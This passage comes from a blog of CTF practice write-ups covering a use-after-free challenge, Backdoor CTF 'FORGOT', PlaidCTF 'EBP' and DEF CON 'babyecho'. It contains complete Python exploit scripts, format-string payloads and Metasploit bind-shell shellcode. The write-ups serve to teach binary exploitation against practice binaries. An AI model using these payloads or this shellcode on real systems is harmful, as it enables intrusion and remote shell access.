Since we know we are dealing with a use-after-free vulnerability, we need to find a way to introduce our custom payload into the freed memory before triggering its (re)use. In order to trick the app into thinking that our payload is a valid struct/element of the linked list, we need to mimic the original struct/element as closely as possible. This is not a problem since we identified what the elements of the list look like in step 2.
Now, we need to find the place where we can introduce the new struct after the memory is being freed. Looking at the create product function at 0x08048852, we see that malloc is being used to allocate 0x4C bytes (which is the size of the struct we identified). Interestingly, this same amount of memory is being allocated in the create profile function at 0x08048B4E! This could be our entry point.

Wrapping up
Now we know how to invoke the vulnerability and insert our payload:
  1. First create at least 3 products (option no. 1 in main menu)
  2. Add the 3 products from above to the manager (option no. 3 in main menu)
  3. Remove product (option no. 2 in main menu)
  4. Create a profile and introduce the payload (option no. 5 in main menu)
  5. View the lowest 3 products (option no. 4 in main menu)
To make things easier, I wrote a Python script to automate all this overhead we need to get to the actual exploiting... the script is at the bottom of the write-up, as usual.

The only problem now was that I was not sure what the 3 unknown fields in the struct should contain. Also, I was not sure how to spoof valid next and previous values. My first instinct was to remove the first element from the list and create a dummy element whose name element points to the flag (at location 0x0804c3e0). Unfortunately that didn't work, so I started fuzzing the create profile parameter in the hopes of finding a clue. I used the pattern below as a starting point.

# /usr/share/metasploit-framework/tools/pattern_create.rb 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A

After issuing the string above as input in the create profile function, we get a segmentation fault that says the address 0x41346151 (Qa4A) is not accessible. Now we know the offset which can be used to put the flag address. One thing is strange, however... it seems the last byte is increased by 24 - so we need to take this into account when building our payload. To sum up, here is what the payload looks like...
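Locating the offset from the faulting address can be reproduced in a few lines. This Python 3 sketch re-implements the upper/lower/digit pattern scheme (my own helper, checked only against the 40-character pattern shown above) and, because the faulting address does not appear verbatim in the pattern, matches on the three bytes that were left unmodified.

```python
import string
import struct

def pattern_create(length):
    """Generate an Aa0Aa1... cyclic pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

pattern = pattern_create(40)

# The faulting address as it sits in memory (little-endian): "Qa4A".
faulting = struct.pack("<I", 0x41346151).decode("ascii")

# The low byte was altered, so search for the remaining three bytes
# and step back one position to get the start of the dword.
offset = pattern.find(faulting[1:]) - 1
print(faulting, offset)
```

The dword that ends up being dereferenced therefore starts 12 bytes into the profile input.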


payload = p32(6)     # price 
payload += p32(0)    # next   
payload += p32(0)    # prev
payload += p32(0) 
payload += p32(flag_addr - 24)  
payload += p32(0)
payload += "KiKi"  #name (50)

And here is the python script used to exploit!

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack, unpack

products = {"Milk" : "21", "Sugar" : "22", "Spice" : "23", "EvNice" : "24"}
to_remove = 1
flag_addr = 0x0804c3e0

def create_products():
 for item in products.keys():
  log.info(conn.recvuntil("Input:"))
  conn.sendline("1")
  
  log.info(conn.recvuntil("Enter product name:"))
  conn.sendline(item)           # product name
  log.info(conn.recvuntil("Enter product price:"))
  conn.sendline(products[item]) # price
  
 
def add_products_to_manager():
 for item in products.keys():
  log.info(conn.recvuntil("Input:"))
  conn.sendline("3")
  
  log.info(conn.recvuntil("Which product name would you like to add:")) 
  conn.sendline(item)
  
def remove_product():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("2")
 
 log.info(conn.recvuntil("Which product name would you like to remove:")) 
 conn.sendline(products.keys()[to_remove])  # product to remove

def create_malicious():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("5")
 
 payload = p32(6)     # price 
 payload += p32(0)    # next   
 payload += p32(0)    # prev
 payload += p32(0) 
 payload += p32(flag_addr - 24)  
 payload += p32(0)
 payload += "KiKi"  #name (50)
 conn.sendline(payload)

def call_malicious():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("4")
 
 log.info(conn.recvuntil("Input:"))
 
conn = remote("localhost", 6667)


create_products()
add_products_to_manager()
remove_product()

create_malicious()

call_malicious()
print conn.recv()



Tuesday, June 23, 2015

Backdoor CTF 2015 "FORGOT" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "FORGOT" and is from Backdoor CTF 2015.

You can download the ELF here.


Running the usual stuff first to see if we get anything interesting...

# file forgot
forgot: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2d0a93353682049b11964e699e753b07c4b8881c, stripped

# /opt/checksec.sh --file forgot
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   forgo

# strings forgot
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
fflush
__isoc99_scanf
puts
stdin
fgets
strlen
stdout
system
__libc_start_main
snprintf
__gmon_start__
GLIBC_2.7
GLIBC_2.0
PTRh
D$8,
D$<@
D$@T
D$Dh
D$H|
|$x 
D$x 
[^_]
Hi %s
   Finite-State Automaton
I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address
    Cheers!
Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?
This all you got? I don't even see an @!
Are you hungry? You just ate the entire part that follows @!
Seems like you work a lot on your localhost, real domains consist of a .[dot]
Sentences end with a [dot], not domains chu!
That is hell of an interesting domain, never seen a top-level domain with a single char.
:) Valid hai!
You just made it. But then you didn't!
./flag
cat %s
What is your name?
I should give you a pointer perhaps. Here: %x
Enter the string to be validate
;*2$"

So this is a dynamically linked binary which has NX enabled - which means we will not be able to run our shellcode from the stack... The strings command shows a few interesting strings in the binary.
We cross-reference these strings to see when they are being used and get to the following piece of assembly.

.text:080486CC                 push    ebp
.text:080486CD                 mov     ebp, esp
.text:080486CF                 sub     esp, 58h
.text:080486D2                 mov     dword ptr [esp+0Ch], offset a_Flag ; "./flag"
.text:080486DA                 mov     dword ptr [esp+8], offset aCatS ; "cat %s"
.text:080486E2                 mov     dword ptr [esp+4], 32h
.text:080486EA                 lea     eax, [ebp-3Ah]
.text:080486ED                 mov     [esp], eax
.text:080486F0                 call    _snprintf
.text:080486F5                 lea     eax, [ebp-3Ah]
.text:080486F8                 mov     [esp], eax
.text:080486FB                 call    _system
.text:08048700                 leave
.text:08048701                 retn
It looks like the flag is located in a file called flag. This function uses snprintf to build the command "cat ./flag" and passes it to system, which sends the flag to stdout. The strange thing is that this function is never called from anywhere in the rest of the binary... funny.. well, moving on!

After running the binary we see that it asks us to input our name and email address. Trying a few input strings we seem to cause a segmentation fault.
# ./forgot
What is your name?
> aaaaaaaaaaaaaa

Hi aaaaaaaaaaaaaa


   Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

    Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault

This looks very much like a buffer overflow. To verify, we simply load the binary in EDB and run a few input strings. The dump below is the stack layout after we input "AAAA". It seems we can overwrite anything below 0xbffbed30 in the dump (that is, anything at a higher address).

bffb:ed20|08048e14|....|
bffb:ed24|bffbed30|0...|ASCII "AAAA"
bffb:ed28|b777d440|@.w.|
bffb:ed2c|00000000|....|
bffb:ed30|41414141|AAAA|
bffb:ed34|00000000|....|
bffb:ed38|00000000|....|
bffb:ed3c|00000001|....|
bffb:ed40|b77be908|..{.|
bffb:ed44|b761c8d0|..a.|
bffb:ed48|bffbee54|T...|
bffb:ed4c|bffc0be2|. ..|ASCII "/media/sf_CTFs/backdoor_2015/forgot/forgot"
bffb:ed50|08048604|....|return to 08048604
bffb:ed54|08048618|....|return to 08048618
bffb:ed58|0804862c|,...|return to 0804862c
bffb:ed5c|08048640|@...|return to 08048640
bffb:ed60|08048654|T...|return to 08048654
bffb:ed64|08048668|h...|return to 08048668
bffb:ed68|0804867c||...|return to 0804867c
bffb:ed6c|08048690|....|return to 08048690
bffb:ed70|080486a4|....|return to 080486a4
bffb:ed74|080486b8|....|return to 080486b8
bffb:ed78|696b696b|kiki|
bffb:ed7c|0804000a|....|
bffb:ed80|00000001|....|
bffb:ed84|bffbee54|T...|
bffb:ed88|bffbee5c|\...|
bffb:ed8c|bffbeda8|....|
bffb:ed90|b764c515|..d.|return to b764c515

Great! But the stack is non-executable, so how do we use this buffer overflow to gain code execution, execute our shellcode and gain shell access so we can find the flag on the remote system? Well... we don't! Turns out we don't really need to go to all the trouble of finding a valid ROP chain for our payload since we already have a piece of code which will print the flag for us (remember the hidden function at 0x080486CC). We just need to redirect the flow of execution to that hidden function.

Luckily, we can overwrite a bunch of return addresses, so redirecting the flow of execution should not be a problem. To speed things up, I'll use a neat little trick to see which return address we need to overwrite.

First, I'll use Metasploit's pattern_create function to create a unique pattern, and then use this pattern as the attack string.

# /usr/share/metasploit-framework/tools/pattern_create.rb 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab

The debugger reports a segmentation fault while trying to access the address 0x41326241. Read as little-endian bytes that is 41 62 32 41, so the sub-string we need to change is Ab2A, which sits at offset 36 in the pattern. That gives us the following attack string!
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1\xCC\x86\x04\x08b3Ab4Ab5Ab
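
The same lookup can be done without Metasploit. Below is a minimal sketch, assuming the pattern follows the usual upper/lower/digit scheme seen above; the helper names cyclic_pattern and pattern_offset are made up for this example and are not part of any library.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

def cyclic_pattern(length):
    """Build a Metasploit-style pattern: Aa0Aa1Aa2... cut to `length` characters."""
    chunks = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(pattern, fault_addr):
    """Return the offset of the 4 pattern bytes that ended up in the faulting address."""
    needle = struct.pack("<I", fault_addr).decode("ascii")  # little-endian, like x86
    return pattern.find(needle)

pattern = cyclic_pattern(50)
offset = pattern_offset(pattern, 0x41326241)   # address reported by the debugger

hidden_function = 0x080486CC                   # the "cat ./flag" function
payload = (pattern[:offset].encode("ascii")
           + struct.pack("<I", hidden_function)
           + pattern[offset + 4:].encode("ascii"))
```

Here offset is the position of Ab2A in the pattern, and payload is the attack string with those four bytes swapped for the address of the hidden function.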

So that was easy! :)

Here is a small python script to automate all this.
from pwn import *
from struct import pack, unpack

conn = remote("localhost", 6667)
log.info(conn.recvuntil(">"))

conn.sendline("kiki")  # send name

log.info(conn.recvuntil(">"))

conn.sendline("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1\xCC\x86\x04\x08b3Ab4Ab5Ab")  # send payload

log.info(conn.recvall())

conn.close()


Saturday, June 6, 2015

PlaidCTF CTF 2015 "EBP" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "EBP" and is from PlaidCTF CTF 2015.

You can download the ELF here.


Let's try the usual stuff first to see what we are dealing with...

# file ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
ebp_a96f7231ab81e1b0d7fe24d660def25a.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xf994804ecd68699809b56d85dbba1038de9f74b0, not stripped

# /opt/checksec.sh --file ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   ebp_a96f7231ab81e1b0d7fe24d660def25a.elf

# strings ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
fflush
puts
stdin
fgets
stdout
__libc_start_main
snprintf
__gmon_start__
GLIBC_2.0
PTRh
QVhG
[^_]
;*2$"

Nothing special - the binary seems to be dynamically linked and was not stripped (which makes things easier). Also, it seems to have no stack protection - which could be a clue to what we are supposed to do.

Running the app, we don't see anything (no messages). After typing away aimlessly (and pressing enter) we see that the input is served back to us. This is obviously an echo app. It reminded me of the last writeup I did on babyecho, so I tried a few format strings to see if this was the same ... and sure enough it was (or at least looked like it was).

# python -c 'print "%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"' | ./ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
b7684ada b7784440 0804a080 bfe10a48 0804852c 00000001 00000000 0804a080 b7783ff4 00000000 00000000 bfe10a68 08048557 0804a080 00000400 b7784440 b7783ff4

Obviously, we have some leakage! At that point I was thinking this was yet another format string where I just needed to learn the offset of the format string on the stack and get out my magic formula for writing any value to any location (like I did in this writeup). Let's fire up EDB and have a look!

Since the app is not stripped and dynamically built, we can easily get to the snprintf function since it is the most likely candidate for the format string vulnerability (looking at strings output, we see that snprintf is used). The call to snprintf is located at 0x0804851A, so this is a good place to put a breakpoint. After entering a bunch of A's, we get the following stack layout:

bfef:9b20|0804a480|....|
bfef:9b24|00000400|....|
bfef:9b28|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b2c|b7606ada|.j`.|return to b7606ada
bfef:9b30|b7706440|@dp.|
bfef:9b34|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b38|bfef9b58|X...|
bfef:9b3c|0804852c|,...|return to 0804852c       
bfef:9b40|00000001|....|
bfef:9b44|00000000|....|
bfef:9b48|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b4c|b7705ff4|._p.|
bfef:9b50|00000000|....|
bfef:9b54|00000000|....|
bfef:9b58|bfef9b78|x...|
bfef:9b5c|08048557|W...|return to 08048557
bfef:9b60|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b64|00000400|....|
bfef:9b68|b7706440|@dp.|
bfef:9b6c|b7705ff4|._p.|
bfef:9b70|08048580|....|
bfef:9b74|00000000|....|
bfef:9b78|bfef9bf8|....|
bfef:9b7c|b75bce46|F.[.|return to b75bce46
bfef:9b80|00000001|....|
bfef:9b84|bfef9c24|$...|
bfef:9b88|bfef9c2c|,...|
bfef:9b8c|b7725860|`Xr.|
bfef:9b90|b773e821|!.s.|return to b773e821
bfef:9b94|ffffffff|....|
bfef:9b98|b7746ff4|.ot.|
bfef:9b9c|080482b1|....|ASCII "__libc_start_main"
bfef:9ba0|00000001|....|
bfef:9ba4|bfef9be0|....|
bfef:9ba8|b7737c16|.|s.|return to b7737c16

So.. the location 0x0804a080 seems to be very popular. That's actually the location of the buffer holding our input. Hmm... wait a second - our input is not on the stack!!1! The tricks I used in the last writeup won't help since they require the input to be on the stack.

What does that mean? It means that we can only write to locations that are directly referenced on the stack! Our end goal should be to overwrite one of the return addresses on the stack with the location of our buffer (a global at 0x0804a080, so not on the stack). But to achieve that, the address of the return address has to be on the stack. For example, if we wanted to overwrite the return address 0xb75bce46 which is at 0xbfef9b7c - the address 0xbfef9b7c would have to be on the stack! Looking at the stack, we got no such luck as it seems the reference to the return address is nowhere to be found (if you think about it, that makes sense!).

Conclusion - our format string input is not on the stack (strictly speaking it sits in a global buffer rather than on the heap, but the consequence is the same), so we need to find another way to write to a memory location. At this point I started searching Google for heap based format strings and came across this paper. It explains a method of overwriting EBP and forcing it to direct the application flow to an attacker controlled space. To quote the paper: A generic way of controlling the execution flow is to overwrite the saved instruction pointer on the stack, so that an address is getting executed on a ret command that was chosen by an attacker.

Obviously, we need to take a look at the function calls in the application to determine the values on each function's stack frame. After a bit of reverse engineering... we get an idea of what the app looks like:
int main()
{
  int result;

  while(1)
  {
    result = (int) fgets(buf, 1024, stdin);
    if ( !result )
      break;
    echo();
  }
  return result;
}

int echo()
{
  make_response();
  puts(response);
  return fflush(stdout);
}

int make_response()
{
  return snprintf(response, 0x400u, buf);
} 

Luckily, the app is very small so it's easy to see that the call chain looks like this: main -> echo -> make_response -> snprintf.

If you look at Fig 2 from the article I mentioned, it gives an example of such a situation. From the stack layout shown below and what we know about the function calls, we can map the various parts of the stack.

bfef:9b2c|b7606ada|.j`.|return to b7606ada           %1$x
bfef:9b30|b7706440|@dp.|                             %2$x  
bfef:9b34|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %3$x
bfef:9b38|bfef9b58|X...|                             %4$x  (EBP)
bfef:9b3c|0804852c|,...|return to 0804852c           %5$x  (return to echo)
bfef:9b40|00000001|....|                             %6$x
bfef:9b44|00000000|....|                             %7$x
bfef:9b48|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %8$x
bfef:9b4c|b7705ff4|._p.|                             %9$x
bfef:9b50|00000000|....|                             %10$x
bfef:9b54|00000000|....|                             %11$x
bfef:9b58|bfef9b78|x...|                             %12$x (EBP)
bfef:9b5c|08048557|W...|return to 08048557           %13$x (return to main)
bfef:9b60|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %14$x 
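
The mapping between stack addresses and %N$x indexes is plain arithmetic, and the dump can also be searched for slots whose value is itself the address of another slot (the only places a %N$n can reach). A small sketch using the values from the dump above; the helper names are made up for this example.

```python
# Stack slots seen by snprintf, copied from the EDB dump above.
FIRST_PARAM_ADDR = 0xbfef9b2c   # slot read by %1$x

stack = {
    0xbfef9b2c: 0xb7606ada, 0xbfef9b30: 0xb7706440, 0xbfef9b34: 0x0804a080,
    0xbfef9b38: 0xbfef9b58, 0xbfef9b3c: 0x0804852c, 0xbfef9b40: 0x00000001,
    0xbfef9b44: 0x00000000, 0xbfef9b48: 0x0804a080, 0xbfef9b4c: 0xb7705ff4,
    0xbfef9b50: 0x00000000, 0xbfef9b54: 0x00000000, 0xbfef9b58: 0xbfef9b78,
    0xbfef9b5c: 0x08048557, 0xbfef9b60: 0x0804a080,
}

def positional_index(slot_addr, first_param_addr=FIRST_PARAM_ADDR, word_size=4):
    """Return N such that %N$x reads the 32-bit word stored at slot_addr."""
    delta = slot_addr - first_param_addr
    if delta < 0 or delta % word_size != 0:
        raise ValueError("address is not a parameter slot")
    return delta // word_size + 1

def pointer_pairs(stack):
    """List (source, target) pairs where %source$n would write into slot %target."""
    pairs = []
    for addr in sorted(stack):
        value = stack[addr]
        if value in stack:
            pairs.append((positional_index(addr), positional_index(value)))
    return pairs

pairs = pointer_pairs(stack)
```

For this dump the only pair is (4, 12): a write through %4$n lands in the slot that %12$x reads.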

We see that the value at offset %4$x is a saved EBP. It points to 0xbfef9b58 (offset %12$x), which is where the EBP of the main function is saved. By using %4$n we can therefore write to that location and replace main's saved EBP with whatever value we want. With a bit of trial and error, I came to this value which successfully overwrites main's EBP with 0x0804a090.

AAAA%134520972u%4$nABCDEFGHIJKLMNOPRSTUVXZYAAAAAAAAAAAAAAAAAAAAAAAA
This sets the EIP value to the address 0x45444342, which corresponds to the string BCDE we appended in the above payload. We can now control the EIP!
With a few minor adaptations, the above string can be changed to point to our shellcode.
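
The numbers in these payloads can also be derived instead of found by trial and error. The sketch below assumes main ends with the standard leave; ret epilogue, so that once its saved EBP is replaced, the return address is read from the new EBP plus 4. The variable names are made up for this example.

```python
import struct

BUF_ADDR = 0x0804a080      # global input buffer, taken from the stack dump
PIVOT = BUF_ADDR + 0x10    # value written over main's saved EBP (0x0804a090)

# %n stores the number of characters printed so far, so the padding
# is the target value minus what was already printed ("AAAA").
prefix = b"AAAA"
pad = PIVOT - len(prefix)
fmt = prefix + b"%" + str(pad).encode("ascii") + b"u%4$n"

# leave; ret with EBP == PIVOT pops EBP from PIVOT and EIP from PIVOT + 4.
eip_slot = PIVOT + 4
filler = b"A" * (eip_slot - BUF_ADDR - len(fmt))

ret_target = 0x0804a0a0            # address placed in the EIP slot
nop_sled = b"\x90" * 30
sled_start = eip_slot + 4          # first NOP sits right after the EIP slot
sled_end = sled_start + len(nop_sled)

# The shellcode would be appended after the NOP sled.
payload = fmt + filler + struct.pack("<I", ret_target) + nop_sled
```

The format string is 19 bytes long, so a single filler byte is needed to line the return address up with offset 20 of the buffer, and 0x0804a0a0 falls inside the NOP sled.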

"AAAA" + "%134520972u%4$n" + "A"+ "\xa0" + "\xa0"+ "\x04" +"\x08" +"\x90"*30 + shellcode

Before putting it all together, I chose a classic shellcode to go with the payload, the shell_bind_tcp from Metasploit.
# msfpayload linux/x86/shell_bind_tcp C

unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

This is the final exploit script written in python using pwn library. Once the exploit is done, one can easily connect to the target via the NetCat tool on port 4444, and gain shell access.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

conn = remote("localhost", 6667)

payload = "AAAA" + "%134520972u%4$n" + "A"+ "\xa0" + "\xa0"+ "\x04" +"\x08" +"\x90"*30 + shellcode

log.info("Sending payload")
conn.sendline(payload)

msg = conn.recv()
print msg

conn.close()
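
As a sanity check, the port the bind shell listens on can be read back from the shellcode bytes. This is a small sketch, assuming the port follows the push instruction that loads AF_INET (2) as in the bytes above; it also checks that the shellcode contains no newline, which would cut the input short in fgets.

```python
import struct

shellcode = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    b"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    b"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    b"\x0b\xcd\x80"
)

# push imm32 (0x68) whose first two bytes are sin_family = AF_INET (2)
marker = b"\x68\x02\x00"
idx = shellcode.find(marker)

# The next two bytes are the port in network (big-endian) byte order.
port = struct.unpack(">H", shellcode[idx + 3:idx + 5])[0]

has_newline = b"\n" in shellcode   # fgets would stop reading at a newline
```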


Tuesday, June 2, 2015

DEF CON Qualifier 2015 "babyecho" - practice session write-up

Hello and welcome to another practice session write-up (disclaimer).
Today's challenge is called "babyecho" and is from DEF CON Qualifier 2015.

You can download the ELF here.

Looking at the output of file command, we see that the binary had been statically linked and stripped. This means it will have a huge amount of lib code and it will be hard to distinguish it from the actual "app" code.
# file ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x8566a6c92bd79a1521b557d1e2855af0eef527e4, stripped

Loading the binary into IDA, we can see that there are in fact 1242 functions ... going through that by hand should be fun!
Looking over The IDA Pro Book, I see that the full-fledged Pro version of IDA has something called FLIRT signatures (built with the FLAIR tools), which can help fingerprint functions in statically built binaries that come from commonly known libraries (and are built by the most common compilers). Unfortunately, it seems that these signatures only come for Windows system libraries and compilers. Which kind of makes sense seeing as how there are a million versions and sub-versions of the same Linux library - same goes for compilers, and when you mix the two together... -.-'

OK - so we're probably not going to get anywhere by digging through the binary. Let's run it and see what it actually does!
./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
Reading 13 bytes
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA
Reading 13 bytes
AAAAAAAAAAAA
Reading 13 bytes
AAAAAAAAAA
Reading 13 bytes

It seems the binary is reading an array of characters and is printing it back after chopping it to 13 bytes. Well that's cute! Obviously this is not a buffer overflow seeing as how we added more than 13 bytes, and no segmentation fault occurred.
Tinkering a bit with various inputs, it seems the binary is vulnerable to a format string attack. The string "%08x" prints the hex value of the next argument on the stack. Judging by the response, we can obviously leak some info from the stack.
# ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
Reading 13 bytes
%08x %08x %08x
0000000d 0000000a 
Reading 13 bytes
x
Reading 13 bytes

At this point I became interested whether or not the binary had any protection mechanisms, so I used checksec. It's a really handy tool that prints out everything we need without having to use readelf and peek in a bunch of proc folders. It seems the binary really has no stack protection at all (hence the prefix "baby" I assume) :)

# /opt/checksec.sh --file babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   babyecho_eb11fdf6e40236b1a37b7974c53b6c3d

To really understand where the vulnerability is and how it can be exploited, we need to peek under the hood. The problem is, it's really hard to find the function in charge of handling the user input since the binary has been statically linked. Fortunately, the string "Reading 13 bytes" is printed right before parsing our input, so let's try a dirty little trick to locate the needle in a haystack.

First we locate the string "Reading 13 bytes" in memory.
The string is in the data section at 0x080BE5F1.
The entry where the string resides seems to be referenced by a function at location 0x08048F3C+98. Here is a dump of that function.

.text:08048F3C                 push    ebp
.text:08048F3D                 mov     ebp, esp
.text:08048F3F                 and     esp, 0FFFFFFF0h
.text:08048F42                 sub     esp, 420h
.text:08048F48                 mov     eax, large gs:14h
.text:08048F4E                 mov     [esp+420h+var_4], eax
.text:08048F55                 xor     eax, eax
.text:08048F57                 lea     eax, [esp+420h+var_404]
.text:08048F5B                 mov     [esp+420h+var_40C], eax
.text:08048F5F                 mov     [esp+420h+var_408], 0
.text:08048F67                 mov     [esp+420h+var_410], 0Dh
.text:08048F6F                 mov     eax, off_80EA4C0
.text:08048F74                 mov     [esp+420h+var_414], 0
.text:08048F7C                 mov     [esp+420h+var_418], 2
.text:08048F84                 mov     [esp+420h+var_41C], 0
.text:08048F8C                 mov     [esp+420h+var_420], eax
.text:08048F8F                 call    loc_804FC40
.text:08048F94                 mov     [esp+420h+var_41C], offset sub_8048EB1
.text:08048F9C                 mov     [esp+420h+var_420], 0Eh
.text:08048FA3                 call    sub_804DE70
.text:08048FA8                 mov     [esp+420h+var_420], 14h
.text:08048FAF                 call    sub_806CB50
.text:08048FB4                 jmp     short loc_804902C
.text:08048FB6 ; ---------------------------------------------------------------------------
.text:08048FB6
.text:08048FB6 loc_8048FB6:                            ; CODE XREF: sub_8048F3C+F5 j
.text:08048FB6                 mov     eax, 3FFh
.text:08048FBB                 cmp     [esp+420h+var_410], 3FFh
.text:08048FC3                 cmovle  eax, [esp+420h+var_410]
.text:08048FC8                 mov     [esp+420h+var_410], eax
.text:08048FCC                 mov     eax, [esp+420h+var_410]
.text:08048FD0                 mov     [esp+420h+var_41C], eax
.text:08048FD4                 mov     [esp+420h+var_420], offset aReadingDBytes ; "Reading %d bytes\n"
.text:08048FDB                 call    sub_804F560
.text:08048FE0                 mov     [esp+420h+var_418], 0Ah
.text:08048FE8                 mov     eax, [esp+420h+var_410]
.text:08048FEC                 mov     [esp+420h+var_41C], eax
.text:08048FF0                 lea     eax, [esp+420h+var_404]
.text:08048FF4                 mov     [esp+420h+var_420], eax
.text:08048FF7                 call    sub_8048E24
.text:08048FFC                 lea     eax, [esp+420h+var_404]
.text:08049000                 mov     [esp+420h+var_420], eax
.text:08049003                 call    sub_8048ECF
.text:08049008                 lea     eax, [esp+420h+var_404]
.text:0804900C                 mov     [esp+420h+var_420], eax
.text:0804900F                 call    sub_804F560
.text:08049014                 mov     [esp+420h+var_420], 0Ah
.text:0804901B                 call    loc_804FDE0
.text:08049020                 mov     [esp+420h+var_420], 14h
.text:08049027                 call    sub_806CB50
.text:0804902C
.text:0804902C loc_804902C:                            ; CODE XREF: sub_8048F3C+78 j
.text:0804902C                 cmp     [esp+420h+var_408], 0
.text:08049031                 jz      short loc_8048FB6
.text:08049033                 mov     eax, 0
.text:08049038                 mov     edx, [esp+420h+var_4]
.text:0804903F                 xor     edx, large gs:14h
.text:08049046                 jz      short locret_804904D
.text:08049048                 call    sub_806F1F0
.text:0804904D
.text:0804904D locret_804904D:                         ; CODE XREF: sub_8048F3C+10A j
.text:0804904D                 leave
.text:0804904E                 retn



As we can see, the 13 byte limitation is pushed on to the stack (0Dh). It also seems that there is a hard-coded input size of 1023 bytes (3FFh), and that the input size is being compared to it. The function sub_804F560 is used at 08048FDB (where the "Reading 13 bytes" is being printed) and 0804900F (this seems like a good place to put a breakpoint and peek at the stack).
